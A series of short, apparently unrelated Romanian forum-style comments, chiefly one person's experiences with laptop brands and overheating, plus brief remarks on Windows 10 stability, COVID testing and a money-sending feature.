Da, te inteleg ca si eu am tot auzit de asta. O posibila problema ar fi supraincalzirea daca sunt prost facute dar cred ca toate se incing daca sunt putin forjate. Eu ti-as recomanda sa te iei dupa specificatii dar sa tii si cont la partea de racire sau chiar ce tastatura are (am avut probleme dupa 7 ani cu Asus Rog, dar sarmanul a indurat multe )

De ce as avea nevoie de telefon? Acum postez doar gandidu-ma la asta.

Am avut Toshiba acum 10 ani. Inca merge, se uita tata la filme pe el. Apoi am avut un ASUS RoG, inca merge dar nu il mai folosesc. Acum am un Lenovo care la fel, e impecabila. La munca cred ca am avut HP, Dell, MacBook si Lenovo. Nu prea am inteles aceste comparatii intre brand-uri deoarece eu nu am avut niciodata nicio problema cu vreun laptop.

Pe mine m-ar interesa mai mult parte de stabilitate decat de security. Windows 10 e ok din acest punct de vedere deci nu imi fac griji in privinta unei versiuni noi.

Sunt si vaccinat, am facut si un test PCR acum ceva timp si mai multe teste antigen (facute singur, acasa, inainte sa merg in diverse locuri). Nu am murit, dar banuiesc ca nu mai am mult de trait nu?

Da, iti dai seama ca e bine.

Frumos, vad ca aparent se foloseste sa trimiti bani, puteau da ceva mai bine.